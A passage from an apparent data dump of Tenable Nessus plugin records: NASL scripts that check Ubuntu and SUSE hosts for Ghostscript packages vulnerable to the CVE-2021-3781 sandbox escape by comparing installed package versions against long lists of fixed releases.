script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"USN\", value:\"5075-1\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 21.04 : Ghostscript vulnerability (USN-5075-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 21.04 host has packages installed that are affected by a vulnerability as referenced in\nthe USN-5075-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5075-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ghostscript-x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgs9-common\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nvar release = chomp(release);\nif (! preg(pattern:\"^(20\\.04|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 21.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'ghostscript', 'pkgver': '9.50~dfsg-5ubuntu4.3'},\n {'osver': '20.04', 'pkgname': 'ghostscript-x', 'pkgver': '9.50~dfsg-5ubuntu4.3'},\n {'osver': '20.04', 'pkgname': 'libgs-dev', 'pkgver': '9.50~dfsg-5ubuntu4.3'},\n {'osver': '20.04', 'pkgname': 'libgs9', 'pkgver': '9.50~dfsg-5ubuntu4.3'},\n {'osver': '20.04', 'pkgname': 'libgs9-common', 'pkgver': '9.50~dfsg-5ubuntu4.3'},\n {'osver': '21.04', 'pkgname': 'ghostscript', 'pkgver': '9.53.3~dfsg-7ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'ghostscript-x', 'pkgver': '9.53.3~dfsg-7ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libgs-dev', 'pkgver': '9.53.3~dfsg-7ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libgs9', 'pkgver': '9.53.3~dfsg-7ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libgs9-common', 'pkgver': '9.53.3~dfsg-7ubuntu0.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ghostscript / ghostscript-x / libgs-dev / libgs9 / libgs9-common');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-16T15:09:33", "description": "The remote SUSE Linux SLED15 / SLES15 / SLES_SAP15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:3044-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-16T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : ghostscript (SUSE-SU-2021:3044-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3781"], "modified": "2023-07-14T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:ghostscript", "p-cpe:/a:novell:suse_linux:ghostscript-devel", "p-cpe:/a:novell:suse_linux:ghostscript-x11", "p-cpe:/a:novell:suse_linux:libspectre-devel", "p-cpe:/a:novell:suse_linux:libspectre1"], "id": "SUSE_SU-2021-3044-1.NASL", "href": "https://www.tenable.com/plugins/nessus/153423", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:3044-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153423);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/14\");\n\n script_cve_id(\"CVE-2021-3781\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:3044-1\");\n script_xref(name:\"IAVB\", value:\"2021-B-0055-S\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : ghostscript (SUSE-SU-2021:3044-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 / SLES_SAP15 host has packages installed that are affected by a vulnerability as\nreferenced in the SUSE-SU-2021:3044-1 advisory.\n\n - A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter\n by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute\n arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from\n this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-3781)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1184123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1190381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3781\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-September/009444.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6abd36c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3781\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:ghostscript-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libspectre1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1|2|3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1/2/3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(0|1)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP0/1\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-1', 'sles-release-15.1']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-ESPOS-release-15', 'SLE_HPC-LTSS-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'cpu':'aarch64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-LTSS-release-15.1']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.2']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-basesystem-release-15.3']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.2']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.2']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.2']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.2']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.3']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.3']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.3']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-module-desktop-applications-release-15.3']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'libspectre1-0.2.8-3.12.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15']},\n {'reference':'ghostscript-9.52-155.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'ghostscript-devel-9.52-155.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'ghostscript-x11-9.52-155.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-ltss-release-15.1']},\n {'reference':'libspectre-devel-0.2.8-3.12.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 